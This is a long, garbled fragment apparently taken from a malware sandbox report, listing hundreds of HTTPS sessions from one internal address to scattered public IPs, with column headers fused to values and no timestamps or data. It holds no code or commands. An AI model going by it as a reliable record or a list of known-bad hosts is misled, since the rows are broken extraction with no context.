                                            23890192.168.2.233507041.200.213.13443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23891192.168.2.2341536123.254.35.59443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23892192.168.2.2346952143.77.76.187443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23893192.168.2.2336982213.10.140.68443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23894192.168.2.2360068164.189.115.49443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23895192.168.2.2356966103.142.4.193443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23896192.168.2.234383614.209.243.209443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23897192.168.2.2348698182.73.121.149443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23898192.168.2.233991268.74.78.130443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23899192.168.2.234830223.55.48.115443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23900192.168.2.2349886140.218.143.156443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23901192.168.2.2338246204.242.237.194443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23902192.168.2.2352916109.178.101.182443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23903192.168.2.2352012165.179.5.147443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23904192.168.2.2341316212.1.214.179443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23905192.168.2.2344548199.217.41.152443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23906192.168.2.235854460.59.129.12443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23907192.168.2.2334426181.113.197.41443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23908192.168.2.2354108117.142.0.169443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23909192.168.2.2344110187.163.174.91443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23910192.168.2.2353986134.78.29.188443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23911192.168.2.23399188.22.24.38443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23912192.168.2.2351562117.22.167.5443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23913192.168.2.233365081.213.173.121443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23914192.168.2.2355872140.172.148.26443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23915192.168.2.2357478223.253.228.10443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23916192.168.2.234965663.151.93.40443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23917192.168.2.233878823.212.84.150443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23918192.168.2.2343976103.116.156.26443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23919192.168.2.2353986101.233.244.241443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23920192.168.2.2343966210.35.150.106443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23921192.168.2.2333918175.77.89.208443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23922192.168.2.2348406124.15.213.213443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23923192.168.2.2357446186.27.203.26443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23924192.168.2.2334228116.172.202.33443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23925192.168.2.2351558119.219.4.220443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23926192.168.2.2334446102.94.174.162443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23927192.168.2.2360568129.3.18.106443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23928192.168.2.2333674160.13.64.72443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23929192.168.2.2348416192.253.118.52443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23930192.168.2.2342888216.18.178.0443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23931192.168.2.2341290207.183.96.178443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23932192.168.2.233853097.185.11.25443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23933192.168.2.235075441.145.31.90443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23934192.168.2.2334098103.5.195.90443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23935192.168.2.234854669.10.221.15443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23936192.168.2.2356710167.128.207.68443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23937192.168.2.2338362176.239.22.130443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23938192.168.2.235881079.53.143.130443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23939192.168.2.2342074190.125.45.123443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23940192.168.2.2341550200.216.55.136443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23941192.168.2.235018483.99.30.240443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23942192.168.2.234810417.68.235.69443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23943192.168.2.2342050138.53.104.18443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23944192.168.2.2345750185.70.132.97443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23945192.168.2.235084269.138.141.172443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23946192.168.2.233766062.251.66.204443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23947192.168.2.235057874.140.222.69443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23948192.168.2.233677479.161.7.71443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23949192.168.2.2340150189.4.115.0443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23950192.168.2.2351688148.136.38.141443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23951192.168.2.235112266.208.80.65443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23952192.168.2.23591368.93.164.128443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23953192.168.2.2335528176.218.224.2443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23954192.168.2.233305251.70.161.172443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23955192.168.2.2334266201.126.195.219443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23956192.168.2.2351696179.45.59.184443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23957192.168.2.2341334212.214.116.62443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23958192.168.2.2342118206.212.165.5443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23959192.168.2.234259885.98.10.62443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23960192.168.2.2360392131.216.232.133443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23961192.168.2.23420524.27.118.235443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23962192.168.2.234085635.189.188.40443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23963192.168.2.2358156147.193.196.67443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23964192.168.2.234628043.16.30.255443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23965192.168.2.2349064145.161.83.190443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23966192.168.2.2360812179.183.203.180443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23967192.168.2.23384429.189.74.55443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23968192.168.2.2335234208.147.37.45443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23969192.168.2.235887414.54.49.237443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23970192.168.2.2333120109.84.97.141443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23971192.168.2.2347650207.98.187.62443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23972192.168.2.236039227.215.155.249443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23973192.168.2.234648070.212.63.45443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23974192.168.2.2354184112.246.101.187443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23975192.168.2.2358074203.125.38.27443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23976192.168.2.2358720156.0.59.189443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23977192.168.2.233290812.4.71.179443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23978192.168.2.2339306138.65.34.121443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23979192.168.2.2351660197.5.23.86443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23980192.168.2.2336552194.136.125.123443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23981192.168.2.2346958204.205.104.32443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23982192.168.2.2360126149.204.251.185443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23983192.168.2.2349612223.112.28.154443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23984192.168.2.2335240175.241.61.222443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23985192.168.2.2338780149.113.93.162443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23986192.168.2.235861223.71.238.99443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23987192.168.2.234138898.14.241.20443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23988192.168.2.233355638.57.154.109443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23989192.168.2.234697270.188.37.56443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23990192.168.2.2348354105.123.241.228443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23991192.168.2.2344360118.20.27.100443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23992192.168.2.2356162115.92.100.200443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23993192.168.2.2336082118.15.66.117443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23994192.168.2.235450859.28.155.145443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23995192.168.2.235456880.34.154.65443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23996192.168.2.2332922152.100.56.2443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23997192.168.2.235027266.181.189.80443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23998192.168.2.236066032.88.144.221443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            23999192.168.2.234736441.80.68.102443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24000192.168.2.2356770116.203.75.133443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24001192.168.2.234680474.247.118.154443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24002192.168.2.2338662110.223.219.243443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24003192.168.2.234161241.102.157.193443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24004192.168.2.235046279.198.116.66443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24005192.168.2.2333350219.61.138.122443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24006192.168.2.2344212203.160.44.151443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24007192.168.2.2335716107.250.8.89443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24008192.168.2.2346648182.27.72.162443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24009192.168.2.2333722125.159.206.245443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24010192.168.2.235640898.180.160.188443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24011192.168.2.2343286152.76.69.44443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24012192.168.2.235069065.6.214.198443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24013192.168.2.233402064.222.55.203443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24014192.168.2.2346286211.199.56.8443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24015192.168.2.2355464114.97.214.172443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24016192.168.2.235084063.171.248.85443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24017192.168.2.2353766118.23.56.160443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24018192.168.2.235108070.100.239.91443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24019192.168.2.2352766156.181.99.62443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24020192.168.2.2347584162.227.228.71443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24021192.168.2.234798676.63.247.88443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24022192.168.2.233872032.117.249.20443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24023192.168.2.2338218146.229.255.83443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24024192.168.2.234563280.184.232.251443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24025192.168.2.235477043.191.165.120443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24026192.168.2.233385013.212.130.222443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24027192.168.2.2347076181.20.79.143443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24028192.168.2.233360267.39.54.145443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24029192.168.2.2345630166.183.35.137443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24030192.168.2.2358278119.35.249.21443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24031192.168.2.2358660168.200.55.8443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24032192.168.2.2338754212.92.244.73443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24033192.168.2.2347246107.31.184.199443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24034192.168.2.235724260.179.156.145443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24035192.168.2.235103295.83.58.16443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24036192.168.2.2347208110.1.193.136443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24037192.168.2.2353290128.96.30.209443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24038192.168.2.234354070.8.198.143443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24039192.168.2.233278272.218.64.86443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24040192.168.2.2337312126.188.246.8443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24041192.168.2.2339706159.234.185.149443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24042192.168.2.233531657.14.73.106443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24043192.168.2.2341036168.33.34.106443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24044192.168.2.2340200117.166.200.181443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24045192.168.2.236094850.207.86.80443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24046192.168.2.23568325.237.156.105443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24047192.168.2.2348458123.226.176.155443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24048192.168.2.2339346143.48.248.103443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24049192.168.2.236014296.103.74.126443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24050192.168.2.2345598143.51.107.224443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24051192.168.2.2337280129.164.46.189443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24052192.168.2.2342008119.29.167.221443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24053192.168.2.2358242176.126.80.61443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24054192.168.2.2349178162.222.42.100443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24055192.168.2.2337538123.188.18.135443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24056192.168.2.234716668.88.157.61443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24057192.168.2.2339424137.254.102.116443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24058192.168.2.2339326200.229.90.45443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24059192.168.2.2344422185.87.123.159443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24060192.168.2.2344586105.100.255.9443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24061192.168.2.234834445.24.30.153443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24062192.168.2.2350828132.200.29.198443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24063192.168.2.2341346161.88.110.83443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24064192.168.2.2352462220.247.95.67443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24065192.168.2.234457436.13.252.85443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24066192.168.2.2355730120.36.31.164443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24067192.168.2.2333498153.148.195.249443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24068192.168.2.2349798194.181.115.242443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24069192.168.2.235344499.204.39.9443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24070192.168.2.2337374177.49.154.161443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24071192.168.2.235481017.111.132.178443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24072192.168.2.235930887.77.235.252443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24073192.168.2.2346230211.180.93.6443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24074192.168.2.2335706218.236.109.94443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24075192.168.2.2348636209.75.210.56443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24076192.168.2.2345046152.161.250.85443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24077192.168.2.2360190106.109.211.216443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24078192.168.2.2358700121.102.74.81443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24079192.168.2.235682652.198.251.138443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24080192.168.2.235951240.212.14.147443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24081192.168.2.2353964122.57.228.21443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24082192.168.2.2352876134.211.41.131443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24083192.168.2.2341488213.17.250.105443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24084192.168.2.2351936113.59.165.22443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24085192.168.2.235540020.23.72.20443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24086192.168.2.234801649.160.239.192443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24087192.168.2.2351034193.88.227.166443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24088192.168.2.2333188156.148.229.18443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24089192.168.2.2356474116.75.121.177443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24090192.168.2.2353698107.97.225.180443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24091192.168.2.234575065.246.248.87443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24092192.168.2.234597017.74.117.194443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24093192.168.2.234427295.79.225.226443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24094192.168.2.2350054120.173.193.161443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24095192.168.2.235667498.172.41.244443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24096192.168.2.2350724163.37.22.204443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24097192.168.2.2338812211.142.215.243443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24098192.168.2.2337906162.249.112.177443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24099192.168.2.2345732194.154.104.77443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24100192.168.2.2360418134.211.228.82443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24101192.168.2.2352596115.227.251.75443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24102192.168.2.2344900217.12.7.31443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24103192.168.2.2343212206.138.192.89443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24104192.168.2.236019441.171.255.82443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24105192.168.2.233695051.2.235.98443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24106192.168.2.233591485.15.22.184443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24107192.168.2.234401480.189.138.153443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24108192.168.2.235425274.100.172.8443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24109192.168.2.2359534187.4.203.134443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24110192.168.2.2341318138.234.245.26443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            24111192.168.2.233513848.174.111.114443
                                            TimestampBytes transferredDirectionData


